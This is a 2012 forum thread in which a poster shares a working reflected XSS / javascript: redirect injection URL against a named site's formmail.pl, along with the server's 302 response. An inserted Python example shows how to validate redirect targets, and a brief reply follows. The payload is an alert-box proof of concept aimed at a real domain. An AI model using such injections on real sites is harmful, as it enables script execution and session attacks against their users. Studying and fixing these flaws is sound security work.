Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
formmail.pl javascript alert tag plus html alert tag within javascript tag
Posted by: johndoe
Date: February 05, 2012 11:37AM

Hello guys, I just found out on my own how to include HTML within JavaScript... A working link with a vulnerable formmail is here:

http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;

Notice the URL encoding...

The original formmail JavaScript injection was:

http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);

I used this in Firefox version 7. When I copied it here, the message board system automatically encoded the tags and parentheses.

After I injected the code I got a 302 error that looked like this:

Found

The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80

A 123 alert box popped up and later a Hello alert box popped up.



Edited 1 time(s). Last edit at 02/05/2012 11:38AM by johndoe.

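The behaviour reported in the post above depends on the form handler copying an unvalidated `redirect` value into its 302 response. As an added example (not part of the thread and not FormMail's own code), this is one way a handler could validate the redirect target before using it; `safe_redirect`, `ALLOWED_HOSTS` and `FALLBACK` are hypothetical names and values chosen for the example.

```python
from urllib.parse import urlsplit

# Assumptions for this example: hypothetical allowlist and fallback page.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.com", "www.example.com"}
FALLBACK = "https://www.example.com/thanks.html"


def safe_redirect(raw, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return raw only if it is an absolute http(s) URL on an allowed host."""
    if not raw:
        return fallback
    # Whitespace and control characters allow header splitting (CR/LF) and
    # scheme obfuscation (a tab inside "javascript:"); browsers read a
    # backslash as a slash. Refuse them outright instead of normalising.
    if "\\" in raw or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in raw):
        return fallback
    try:
        parts = urlsplit(raw)
        host = (parts.hostname or "").lower()
    except ValueError:  # e.g. malformed IPv6 literal
        return fallback
    if parts.scheme not in ALLOWED_SCHEMES:  # urlsplit lowercases the scheme
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback  # userinfo such as "https://example.com@other.test/"
    if host not in allowed_hosts:
        return fallback
    return raw


# Constructed sample values; the first has the shape of the value in the post.
SAMPLES = [
    "javascript:alert(123);",
    "JaVaScRiPt:alert(123);",
    "java\tscript:alert(123);",
    "//other.test/",
    "https://www.example.com@other.test/",
    "https://www.example.com/ok\r\nSet-Cookie: a=b",
    "https://www.example.com/thanks.html",
]

if __name__ == "__main__":
    for value in SAMPLES:
        verdict = "allow" if safe_redirect(value) == value else "reject"
        print(f"{verdict:6} {value!r}")
```
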
Re: formmail.pl javascript alert tag plus html alert tag within javascript tag
Posted by: PaPPy
Date: February 06, 2012 01:51PM

Is there a question here?

http://www.xssed.com/archive/author=PaPPy/
